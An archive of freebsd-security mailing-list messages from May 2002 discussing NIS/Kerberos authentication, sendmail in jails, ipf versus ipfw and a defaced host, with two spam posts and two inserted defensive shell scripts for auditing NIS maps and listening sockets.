-----BEGIN PGP SIGNATURE-----
Comment: For info see http://www.gnupg.org

iD8DBQE8180gs5Nr9N7JSKYRAieWAKCs0Aby8JrKX4Wu056rU5LjqE/lvgCfb3iO
I0koDrVu76V+zfKL1AZJ5r4=
=PIbP
-----END PGP SIGNATURE-----

--aiCxlS1GuupXjEh3--

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 7: 8:49 2002 Delivered-To: freebsd-security@freebsd.org Received: from dc.cis.okstate.edu (dc.cis.okstate.edu [139.78.100.219]) by hub.freebsd.org (Postfix) with ESMTP id 5D2B137B412 for ; Tue, 7 May 2002 07:08:35 -0700 (PDT) Received: from dc.cis.okstate.edu (localhost [127.0.0.1]) by dc.cis.okstate.edu (8.11.6/8.11.3) with ESMTP id g47E8Vl29936 for ; Tue, 7 May 2002 09:08:34 -0500 (CDT) (envelope-from martin@dc.cis.okstate.edu) Message-Id: <200205071408.g47E8Vl29936@dc.cis.okstate.edu> To: freebsd-security@FreeBSD.ORG Subject: I am My Own Worst Enemy Regarding Denial of Service! Date: Tue, 07 May 2002 09:08:31 -0500 From: Martin McCormick Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

I set up our syslog.conf on a FreeBSD system to notify all of us when the network equipment we monitor sends a critical syslog message.
This works perfectly and we get the messages on all logged-in TTY's. The system breaks down if one of our pieces of gear goes in to a failure mode in which it sends a continuous or more or less continuous stream of messages to everybody with such frequency that the window or screen is quickly filled. Is there any way to define a login in such a way as to escape the bombardment? The idea is to define one terminal with no messages in order to be able to work without interruption on the system in question. Martin McCormick WB5AGZ Stillwater, OK OSU Center for Computing and Information Services Network Operations Group To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 7:12:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from rhodium.cix.co.uk (rhodium.cix.co.uk [194.153.21.68]) by hub.freebsd.org (Postfix) with ESMTP id 7841E37B400; Tue, 7 May 2002 07:11:49 -0700 (PDT) Received: from ctek-uk.com (126.234.35.212.in-addr.arpa.ip-pool.cix.co.uk [212.35.234.126]) by rhodium.cix.co.uk (8.9.3+Sun/8.9.3) with SMTP id JAA03618; Tue, 7 May 2002 09:06:05 +0100 (BST) X-Envelope-From: alex@ctek-uk.com Message-Id: <200205070806.JAA03618@rhodium.cix.co.uk> From: "Alex" To: Subject: PC for sale Mime-Version: 1.0 Content-Type: text/plain; charset="ISO-8859-1" Date: Tue, 7 May 2002 09:06:37 +0100 Reply-To: "Alex" Content-Transfer-Encoding: 8bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, We have a limited number of IBM Desktop PC's for sale: Pentium 166 MMX, 2.5 Gb Hard Drive, 64 Mb RAM, 3.5" Floppy, 52x CD-Rom drive, 15" SVGA Monitor, Keyboard and Mouse, with Windows 98 and Office XP PRO pre-installed, all for £200. For more info, visit us at www.ctek-uk.com/pc, email us at info@ctek-uk.com or call 0870 742 7816. 
Thanks, Paul

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 7:37:31 2002 Delivered-To: freebsd-security@freebsd.org Received: from koibito.iisc.com (koibito.iisc.com [198.5.5.5]) by hub.freebsd.org (Postfix) with ESMTP id E8C1637B40B for ; Tue, 7 May 2002 07:37:19 -0700 (PDT) Received: from koibito.iisc.com ([127.0.0.1]) by koibito.iisc.com (8.9.0/8.9.0) with ESMTP id KAA23748; Tue, 7 May 2002 10:36:59 -0400 (EDT) Message-Id: <200205071436.KAA23748@koibito.iisc.com> To: sam@wa4phy.net, security@FreeBSD.ORG Subject: Re: Woot project In-Reply-To: Your message of "Mon, 06 May 2002 21:00:02 EDT." <3CD72712.37CB5750@vortex.wa4phy.net> Date: Tue, 07 May 2002 10:36:59 -0400 From: "Charles M. Richmond" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

> I don't have SSH-1 or 2 active at the moment,

That you know of... If your machine has been hacked previously, then that hacker probably left an sshd running as part of his rootkit. It may not be named sshd of course and it does have a back door. Or as you ask below, there is another vector of attack. I had a FreeBSD box hacked and until I figure out how it was done, I can't put it back in the network. Hmmm... maybe I'll put WK2 on it. )-:

> so I'm wondering how access was gained. Have
> searched all the log files for unusual activity, and nothing is apparent
> so far. The message left at the bottom of my main page was:
>
> FreeBSD vortex.wa4phy.net 4.5-STABLE sexcii... - [sYn] of woot-project
>
> Aside from the SSH-1 vulnerabilities, is there any other known
> entry points associated with this cracker group?
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 8:49:17 2002 Delivered-To: freebsd-security@freebsd.org Received: from ra.upan.org (ra.upan.org [204.107.76.19]) by hub.freebsd.org (Postfix) with ESMTP id A6E7F37B400 for ; Tue, 7 May 2002 08:49:10 -0700 (PDT) Received: from ocsinternet.com ([10.0.0.140]) by ra.upan.org (8.11.6/8.11.6) with ESMTP id g47Fm5V42531; Tue, 7 May 2002 11:48:06 -0400 (EDT) (envelope-from mikel@ocsinternet.com) Message-ID: <3CD8058D.4090706@ocsinternet.com> Date: Tue, 07 May 2002 11:49:17 -0500 From: Mikel King User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4.1) Gecko/20020314 Netscape6/6.2.2 X-Accept-Language: en-us MIME-Version: 1.0 To: "Douglas K. Rand" Cc: freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication References: <874riov1et.wl@delta.meridian-enviro.com> <87d6x8smle.fsf@delta.meridian-enviro.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

Douglas,

I know this was an old post, but sometimes I can't keep up with the world...;) In any event... I do understand what it is you require, as I have been suffering from the same dilemma. I tried ldap and wasn't happy with it, probably due to something I didn't set up correctly but that aside. I've used rsync via ssh, and it was time consuming... I began looking for something else.

What I decided, was that I needed something simple: currently I'm playing around with pam_mysql, because I can use mysql's builtins to synchronize the db's, and as things develop I can strap a webfront end on the db and manage the whole thing. Well the latter part is the goal, but as a result of time constraints we're not there quite yet...
Anyway that's what I came up with, and as time permits I've been trying to get there... I am curious to know what you've found... Cheers, mikel Douglas K. Rand wrote: >First, I'm sorry I disappeared for a few days, this has been a great >discussion. > >Jacques Vidrine is right: the subject doesn't really describe what I >need. In addition to authentication I also want centralized >distribution of /etc/passwd (uid, gid, home, shell) and /etc/group. > >A few people suggested NIS+. Virtually all of our boxes are FreeBSD, >and the ones that aren't FreeBSD we wish they were. :) Can I run an >NIS+ server on FreeBSD? I poked around the handbook and the searches >for FreeBSD and NIS+ didn't return anything that lead me to believe >that NIS+ support was ready, or even there. But it also sounds like I >should pick NIS over NIS+ unless I /really/ need the NIS+ features. > >I think Pieter Danhieux was the first to suggest using NIS for >everything EXCEPT the encrypted passwords, an approach that I had >never considered before. After a little thought on this I find myself >liking this idea. I could use NIS to distribute the (relatively) >unsensitive information, everything in /etc/passwd and /etc/group, and >also the login class, password change time, and account expiration >time from /etc/master.passwd, setting the encrypted password to "*". > >Then I can use PAM modules for authentication. (What my subject said >but not quite what I meant. :)) Here are the PAM modules that I know >about and that I'd consider: > > o pam_radius > o pam_ldap > o pam_ssh > >I'm going to group pam_radius and pam_ldap together simply because I >don't know very much about either server. My very limited >understanding leads me to believe that a Radius server is easier to >setup and get working than an LDAP server. I also understand that >unless you go through a fair amount of pain, secure communications >between the client and the LDAP server is difficult. 
I have a few >questions about these PAM modules: > > o How secure is the client-server communications with a Radius > server? > > o Can a user on a client change the password either the Radius or > LDAP server, either with the passwd command or some other command? > >What about the pam_ssh module? Is it reasonable to allow users to >authenticate off their own SSH key, or should the authentication be >done via some other mechanism and then just use the session part of >pam_ssh? I've played around with pam_ssh and xdm/wdm and I really like >having ssh-agent automatically started and your keys added. > >I want to thank everybody for their responses. > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 10:24: 6 2002 Delivered-To: freebsd-security@freebsd.org Received: from agena.meridian-enviro.com (thunder.meridian-enviro.com [207.109.234.227]) by hub.freebsd.org (Postfix) with ESMTP id B33D237B403 for ; Tue, 7 May 2002 10:24:00 -0700 (PDT) Received: from delta.meridian-enviro.com (delta.meridian-enviro.com [10.10.10.43]) by agena.meridian-enviro.com (8.11.6/8.11.6) with ESMTP id g47HNwW27226; Tue, 7 May 2002 12:23:58 -0500 (CDT) (envelope-from rand@meridian-enviro.com) Date: Tue, 07 May 2002 12:23:57 -0500 Message-ID: <87elgnj2he.wl@delta.meridian-enviro.com> From: "Douglas K. 
Rand" To: Mikel King Cc: freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication In-Reply-To: <3CD8058D.4090706@ocsinternet.com> References: <874riov1et.wl@delta.meridian-enviro.com> <87d6x8smle.fsf@delta.meridian-enviro.com> <3CD8058D.4090706@ocsinternet.com> User-Agent: Wanderlust/2.9.7 (Unchained Melody) SEMI/1.14.3 (Ushinoya) FLIM/1.14.3 (=?ISO-8859-4?Q?Unebigory=F2mae?=) APEL/10.3 MULE XEmacs/21.4 (patch 6) (Common Lisp) (i386--freebsd) X-Face: $L%T~#'9fAQ])o]A][d7EH`V;"_;2K;TEPQB=v]rDf_2s% List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org What I've started on is a NIS deployment. It was pointed out to me that all of the pam_* stuff still won't distribute the non-authentication stuff for /etc/passwd (uids, gids, home directories, shells, etc) and it won't do /etc/group stuff either. I'm right now trying to decide to distribute the encrypted passwords with NIS or to use some other pam_* thing, perhaps pam_radius. Our network is well protected by firewalls, so I'm feeling fairly comfortable with NIS for everything except the encrypted password. Actually, with the MD5 encrypted passwords, I also feel somewhat comfortable with NIS shipping those, but I'm still thinking about that. 
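
The option weighed above, NIS carrying the account data but no password hashes, can be checked mechanically. This is an added example, not code from the thread: a shell function that scans passwd-format map entries and reports any whose password field holds something other than a "*" placeholder. The function name audit_map and the sample entries are constructed for illustration.

```shell
#!/bin/sh
# Added example, not from the thread. Audits passwd-format NIS map entries
# (passwd or master.passwd layout; field 2 is the password in both) and
# reports every account whose password field is not a "*" placeholder.
# Exit status: 0 = no password material in the map, 1 = findings.

audit_map() {
    awk -F: '
        /^[ \t]*#/ || /^[ \t]*$/ { next }   # comments and blank lines
        /^[+-]/                  { next }   # NIS compat "+"/"-" inclusion entries
        {
            pw = $2
            if (pw ~ /^\*/) next            # "*" or "*LOCKED*...": no hash published
            if (pw == "")                why = "EMPTY password field"
            else if (pw ~ /^\$1\$/)      why = "MD5 crypt hash"
            else if (pw ~ /^\$/)         why = "modular crypt hash"
            else if (length(pw) == 13)   why = "DES crypt hash"
            else                         why = "unrecognised non-placeholder value"
            print $1 ": " why
            bad = 1
        }
        END { exit (bad ? 1 : 0) }
    '
}

# Constructed sample in master.passwd layout (the hashes are made-up strings).
SAMPLE_MAP='alice:*:1001:1001::0:0:Alice Example:/home/alice:/bin/sh
bob:$1$abcdefgh$0123456789abcdefghijkl:1002:1002::0:0:Bob Example:/home/bob:/bin/sh
carol:ab0123456789A:1003:1003::0:0:Carol Example:/home/carol:/bin/sh
dave::1004:1004::0:0:Dave Example:/home/dave:/bin/sh
+:::::::::'

# Demonstration on the sample. Against a live domain the input would be the
# served map instead, for example:  ypcat passwd.byname | audit_map
printf '%s\n' "$SAMPLE_MAP" | audit_map || echo "map publishes password material"
```

Run from any NIS client, this shows what every other client on the network can read, which is the exposure being weighed when hashes travel in the map.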
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 10:43:47 2002 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 1C0C637B40C for ; Tue, 7 May 2002 10:43:37 -0700 (PDT) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id KAA26981; Tue, 7 May 2002 10:42:51 -0700 Received: from passer.osg.gov.bc.ca(142.32.110.29) via SMTP by point.osg.gov.bc.ca, id smtpda26979; Tue May 7 10:42:39 2002 Received: from cwsys.cwsent.com (cwsys2 [10.1.2.1]) by passer.osg.gov.bc.ca (8.12.3/8.12.3) with ESMTP id g47HgXrO003789; Tue, 7 May 2002 10:42:33 -0700 (PDT) (envelope-from cy@cwsent.com) Received: from cwsys (localhost [127.0.0.1]) by cwsys.cwsent.com (8.12.3/8.12.3) with ESMTP id g47HgSmC090516; Tue, 7 May 2002 10:42:28 -0700 (PDT) (envelope-from cy@cwsys.cwsent.com) Message-Id: <200205071742.g47HgSmC090516@cwsys.cwsent.com> X-Mailer: exmh version 2.5 07/13/2001 with nmh-1.0.4 Reply-To: Cy Schubert - CITS Open Systems Group From: Cy Schubert - CITS Open Systems Group X-Sender: schubert To: "Douglas K. Rand" Cc: Mikel King , freebsd-security@FreeBSD.ORG Subject: Re: Centralized authentication In-Reply-To: Message from "Douglas K. Rand" of "Tue, 07 May 2002 12:23:57 CDT." <87elgnj2he.wl@delta.meridian-enviro.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Tue, 07 May 2002 10:42:28 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org In message <87elgnj2he.wl@delta.meridian-enviro.com>, "Douglas K. Rand" writes: > What I've started on is a NIS deployment. 
It was pointed out to me > that all of the pam_* stuff still won't distribute the > non-authentication stuff for /etc/passwd (uids, gids, home > directories, shells, etc) and it won't do /etc/group stuff either. > > I'm right now trying to decide to distribute the encrypted passwords > with NIS or to use some other pam_* thing, perhaps pam_radius. Our > network is well protected by firewalls, so I'm feeling fairly > comfortable with NIS for everything except the encrypted password. > > Actually, with the MD5 encrypted passwords, I also feel somewhat > comfortable with NIS shipping those, but I'm still thinking about > that. Use NIS to distribute your maps and Kerberos to authenticate. Here is an example from one of my NIS+ (Sun) networks: foobar:*:11037:11000:foobar user - ITSD OSG:/home/foobar:/bin/bash:10248 :::::: Notice the * in the password field. This user cannot log in without some other means of authentication, which in this case is Kerberos. Use either heimdal or KRB5, then use the pam_krb5 port. 
Cheers, Phone: 250-387-8437 Cy Schubert Fax: 250-387-5766 Team Leader, Sun/Alpha Team Email: Cy.Schubert@osg.gov.bc.ca Open Systems Group, CITS Ministry of Management Services Province of BC FreeBSD UNIX: cy@FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 11:29:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from stuff.webintl.com (stuff.webintl.com [209.248.144.10]) by hub.freebsd.org (Postfix) with ESMTP id 21F2337B40C for ; Tue, 7 May 2002 11:28:57 -0700 (PDT) Received: from [192.168.123.20] (adsl-66-136-237-161.dsl.ltrkar.swbell.net [66.136.237.161]) by stuff.webintl.com (8.9.3/8.9.3) with ESMTP id NAA10111 for ; Tue, 7 May 2002 13:28:55 -0500 Mime-Version: 1.0 X-Sender: freebsd@mail.webintl.com Message-Id: In-Reply-To: <20020507062232.A75CE37B400@hub.freebsd.org> References: <20020507062232.A75CE37B400@hub.freebsd.org> Date: Tue, 7 May 2002 13:28:52 -0500 To: freebsd-security@freebsd.org From: Albert Everett Subject: Re: jails and sendmail Content-Type: text/plain; charset="us-ascii" ; format="flowed" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Thanks to those who have answered my post. Full Sendmail now working on host and in all jails. By the way, can someone point me to the postfix patch that allows it to run in a jail? Albert > > On the host itself, I have in rc.conf: sendmail_enable="NO", instead >> of "NONE", to allow cron stuff to get mail out. > >Good, then it won't interfere with the jails. -- on host, setting a daemon option (to listen only on host ip) in .mc makes sendmail_enable="yes" ok in rc.conf. Can also use command line option in sendmail_flags in rc.conf - see p691 in O'Reilly Sendmail 2nd ed. book. > >> I'd like to have sendmail_enable="YES" in each of my jails. 
Right >> now, sendmail doesn't seem to want to start in my jails with ="YES". > >I guess you aliased the jails ip when starting up? -- yes, in rc.conf > >> Is it necessary to tell sendmail inside a jail to listen only on that >> jail's IP? If so, how is this done? I'm hoping a line or two in the >> .mc file will do it, but I'm new to editing these files. > >Nope, not when running in a jail. The jail code translates INADDR_ANY to >just the jails ip. This is done transparently. -- good to know, thanks > >> Is there a problem with the localhost sendmail config being shared >> around the jails, since localhost really belongs to the host itself >> (if I understand localhost correctly)? > >In a jail "localhost" is also mapped to the jails ip. Again transparently. >Do other daemons run and can you access them from outside the jail and/or >other systems? -- good to know about jail localhost, thanks. sshd runs in all jails ok. haven't tried others yet > >Nate > > >To Unsubscribe: send mail to majordomo@FreeBSD.org >with "unsubscribe freebsd-security" in the body of the message -- ----------------------------------------------------------------------- Albert Everett - Web International, Inc. 
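
The point above about host daemons listening only on the host's own address can be checked from `netstat -an` output. This is an added example, not code from the thread: a shell function that classifies each TCP listener as bound to the wildcard address, to the host's address, or to another local address such as a jail's alias. The function names, the addresses and the sample netstat output are constructed.

```shell
#!/bin/sh
# Added example, not from the thread. Classifies TCP listeners in
# `netstat -an` output (FreeBSD layout: local address is column 4, written
# as addr.port) relative to the host's own IP.
#   wildcard : bound to *.port (INADDR_ANY), not restricted to one address
#   host     : bound to the host's own address only
#   other    : bound to some other local address (for example a jail's alias)
# Usage: netstat -an | classify_listeners <host-ip>

classify_listeners() {
    awk -v host="$1" '
        $1 ~ /^tcp/ && $NF == "LISTEN" {
            n = split($4, part, ".")
            port = part[n]                                  # text after the last dot
            addr = substr($4, 1, length($4) - length(port) - 1)
            if (addr == "*")        kind = "wildcard"
            else if (addr == host)  kind = "host"
            else                    kind = "other"
            print port, kind, addr
        }
    ' | LC_ALL=C sort -k1,1n -k2,2 -k3,3 | uniq
}

# Ports on which a host-side daemon still listens on every address.
wildcard_ports() {
    classify_listeners "$1" | awk '$2 == "wildcard" { print $1 }'
}

# Constructed sample: host is 192.0.2.10, one jail is aliased at 192.0.2.11.
SAMPLE_NETSTAT='Active Internet connections (including servers)
Proto Recv-Q Send-Q  Local Address          Foreign Address        (state)
tcp4       0      0  *.25                   *.*                    LISTEN
tcp4       0      0  192.0.2.10.22          *.*                    LISTEN
tcp4       0      0  192.0.2.11.22          *.*                    LISTEN
tcp4       0      0  192.0.2.11.25          *.*                    LISTEN
tcp4       0     48  192.0.2.10.22          198.51.100.7.51514     ESTABLISHED
udp4       0      0  *.514                  *.*'

# Demonstration on the sample; on a real host pipe in `netstat -an` instead.
printf '%s\n' "$SAMPLE_NETSTAT" | classify_listeners 192.0.2.10
```

In the sample, port 25 shows up as a wildcard listener, which is the case the host-side daemon option in the .mc file (or in sendmail_flags) is meant to remove.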
To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 12:55:46 2002 Delivered-To: freebsd-security@freebsd.org Received: from khavrinen.lcs.mit.edu (khavrinen.lcs.mit.edu [18.24.4.193]) by hub.freebsd.org (Postfix) with ESMTP id 683A037B404 for ; Tue, 7 May 2002 12:55:41 -0700 (PDT) Received: from khavrinen.lcs.mit.edu (localhost [IPv6:::1]) by khavrinen.lcs.mit.edu (8.12.3/8.12.3) with ESMTP id g47JteEN077795; Tue, 7 May 2002 15:55:40 -0400 (EDT) (envelope-from wollman@khavrinen.lcs.mit.edu) Received: (from wollman@localhost) by khavrinen.lcs.mit.edu (8.12.3/8.12.3/Submit) id g47Jtedk077792; Tue, 7 May 2002 15:55:40 -0400 (EDT) Date: Tue, 7 May 2002 15:55:40 -0400 (EDT) From: Garrett Wollman Message-Id: <200205071955.g47Jtedk077792@khavrinen.lcs.mit.edu> To: "Karsten W. Rohrbach" Cc: security@FreeBSD.ORG Subject: ports signing, Was: cvsup/install over ssh? In-Reply-To: <20020507144833.L15411@mail.webmonster.de> References: <20020507144833.L15411@mail.webmonster.de> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org < said: > on a high-volume download site i wouldn't even think about implementing > payload signing/encryption on the network layer. the cost of cpu cycles > in such an environment is much too high. as hardware gets faster and > cheaper, it might become reality. Speaking as a mirror operator, I have absolutely no interest whatsoever in doing so. > perhaps someday, there will be tokens and configuration info available > for ftp.freebsd.org, but what about the mirrors? There is a research group in our Lab who are working on solving this problem for the general case of certifying distributed replicas of public data. 
-GAWollman To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:29:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from exgw2.lumeta.com (exgw2.lumeta.com [65.198.68.66]) by hub.freebsd.org (Postfix) with ESMTP id A6F2037B40A for ; Tue, 7 May 2002 15:29:31 -0700 (PDT) Received: from lucy.corp.lumeta.com (h65-198-68-133.lumeta.com [65.198.68.133]) by exgw2.lumeta.com (Postfix) with ESMTP id BCC2A373835 for ; Tue, 7 May 2002 18:29:27 -0400 (EDT) Received: from localhost (localhost [127.0.0.1]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 929A11083F for ; Tue, 7 May 2002 18:29:27 -0400 (EDT) Received: from lumeta.com (gmsync.corp.lumeta.com [65.198.68.251]) by lucy.corp.lumeta.com (Postfix) with ESMTP id 172FD10840 for ; Tue, 7 May 2002 18:29:24 -0400 (EDT) Message-ID: <3CD8558E.2FA68C36@lumeta.com> Date: Tue, 07 May 2002 18:30:38 -0400 From: Tom Limoncelli X-Mailer: Mozilla 4.76 [en] (Windows NT 5.0; U) X-Accept-Language: en,pdf MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: ipf vs. ipfw Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Virus-Scanned: by AMaViS perl-11 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I use ipf, and recently some people have asked me about ipfw that I couldn't answer. Hopefully people on this list can enlighten me. Are ipf and ipfw different interfaces to the same in-kernel filtering mechanism? It doesn't look like it is, but I'd like that confirmed. Is ipfw related at all to the Linux ipfw? The syntax looks the same, but the man page doesn't mention Linux. Why does FreeBSD have both? Is it because ipf is generic (ported to Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for FreeBSD? Thanks in advance! --tal P.S. 
I'm collecting data here: http://whatexit.org/tal/mywritings/freefilters.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:39:28 2002 Delivered-To: freebsd-security@freebsd.org Received: from nexgen.nxginfosys.com (w162.z064002076.nyc-ny.dsl.cnc.net [64.2.76.162]) by hub.freebsd.org (Postfix) with ESMTP id 356CB37B486; Tue, 7 May 2002 15:39:10 -0700 (PDT) Received: from QRJATYDI (lsanca1-ar8-192-008.lsanca1.dsl-verizon.net [4.35.192.8]) by nexgen.nxginfosys.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2650.21) id KFAJ3S7A; Tue, 7 May 2002 18:50:37 -0400 From: HGH@FreeBSD.ORG To: User@FreeBSD.ORG Subject: -=Human Growth Hormone=- X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: The Bat! (v1.60) Personal Date: Wed, 8 May 2002 5:30:45 +0500 Mime-Version: 1.0 Content-Type: text/plain; charset="KOI8-R" Message-Id: <20020507223910.356CB37B486@hub.freebsd.org> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Human Growth Hormone (HGH), also called Somatrotropin, is produced in the anterior of the pituitary gland deep inside the brain, where it is one of the most abundant hormones secreted. HGH influences the growth of cells, bones, muscles and organs throughout the body. 
http://dental.4greatdeal.com/hgh5/ Click below to enter our web site: http://dental.4greatdeal.com/hgh5/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue May 7 15:43:39 2002 Delivered-To: freebsd-security@freebsd.org Received: from mail.npubs.com (npubs.com [207.111.208.224]) by hub.freebsd.org (Postfix) with ESMTP id 8F51637B404 for ; Tue, 7 May 2002 15:43:33 -0700 (PDT) Received: 8.12.2-(Neptune) Received: 8.12.2-(Venus) Received: 8.12.2-(Neptune) From: "Nielsen" To: "Rob Andrews" , References: <135YGUD5H2YCVJ3JLY3L2CMBQCXYNOQCEADYX2T5@ziplip.com> <200205061347.54915.dowen@pstis.com> <20020507062534.E638C37B401@hub.freebsd.org> <20020507014934.D58289@switchblade.cyberpunkz.org> Subject: Re: Telnet Exploit MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-Id: <20020507224333.8F51637B404@hub.freebsd.org> Date: Tue, 7 May 2002 15:43:33 -0700 (PDT) Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I was attempting something like this with sudo to no avail. We were > attempting to setup a separate password file for sudo but it didn't > quite cut it. I've made queries about this before to the list but > no one ever responded to it.. If you just want one password file for shells and another for insecure logins, then use /usr/ports/security/pam_pwdfile. Replace the pam_unix.so in pam.conf for each service you want to use the other password file. > How is it that you have managed to separate using pam, logins for > ftp, pop3, smtp, or whatever you choose from things such as sshd? What we did was something different. 
Wrote a PAM module, that disallows logins for all insecure services (where specified in pam.conf) when the user has a valid shell.

> I'd be real interested in how you've managed this as it would be
> very helpful to future development of machines on my networks.

As it is the module isn't autoconfiscated or anything, but can do if anyone's interested.

Nate

To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message

From owner-freebsd-security Tue May 7 16:15:45 2002 Delivered-To: freebsd-security@freebsd.org Received: from tesla.foo.is (tesla.reverse-bias.org [217.151.166.96]) by hub.freebsd.org (Postfix) with ESMTP id 6B3F537B408; Tue, 7 May 2002 16:15:36 -0700 (PDT) Received: from there (eniac.foo.is [192.168.1.25]) by tesla.foo.is (Postfix) with SMTP id 8B55C2744; Tue, 7 May 2002 23:15:29 +0000 (GMT) Content-Type: text/plain; charset="iso-8859-1" From: Baldur Gislason To: Tom Limoncelli Subject: Re: ipf vs. ipfw Date: Tue, 7 May 2002 23:15:17 +0000 X-Mailer: KMail [version 1.3.2] References: <3CD8558E.2FA68C36@lumeta.com> In-Reply-To: <3CD8558E.2FA68C36@lumeta.com> Cc: freebsd-security@freebsd.org, freebsd-net@freebsd.org MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Message-Id: <20020507231529.8B55C2744@tesla.foo.is> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org

ipfw is in no way related to the linux firewalls (ipfwadm, ipchains or iptables). It is a specially designed firewall for FreeBSD. It isn't dependent on ipf, it has its own in-kernel mechanism. It has a totally different syntax. Why FreeBSD has both I can't answer, ipfw and ipf each have their own advantages over each other. In my experience, ipfw is easier to work with, but it's also limited in some ways.
Ipf tends to have a more complex ruleset, and more stateful functionality
(ipfw can do stateful filtering but ipf has more customisable state keeping
rules IIRC), however ipfw does have the ability to apply rules by uid's if
you're doing a firewall for the local machine, and it does have a
packet/byte counter for each individual rule. I'm not sure how this is with
ipf as I haven't used it as much as I have used ipfw.

Baldur

On Tuesday 07 May 2002 22:30, you wrote:
> I use ipf, and recently some people have asked me about ipfw that I
> couldn't answer. Hopefully people on this list can enlighten me.
>
> Are ipf and ipfw different interfaces to the same in-kernel filtering
> mechanism? It doesn't look like it is, but I'd like that confirmed.
>
> Is ipfw related at all to the Linux ipfw? The syntax looks the same,
> but the man page doesn't mention Linux.
>
> Why does FreeBSD have both? Is it because ipf is generic (ported to
> Solaris, IRIX, OpenBSD, etc) and ipfw is specifically designed for
> FreeBSD?
>
> Thanks in advance!
> --tal
>
> P.S. I'm collecting data here:
> http://whatexit.org/tal/mywritings/freefilters.html

From owner-freebsd-security Tue May 7 17:20:27 2002
Message-ID: <001101c1f626$10d61420$01000001@aragon>
From: "Aragon Gouveia"
To:
Cc: "Tom Limoncelli"
References: <3CD8558E.2FA68C36@lumeta.com> <20020507231529.8B55C2744@tesla.foo.is>
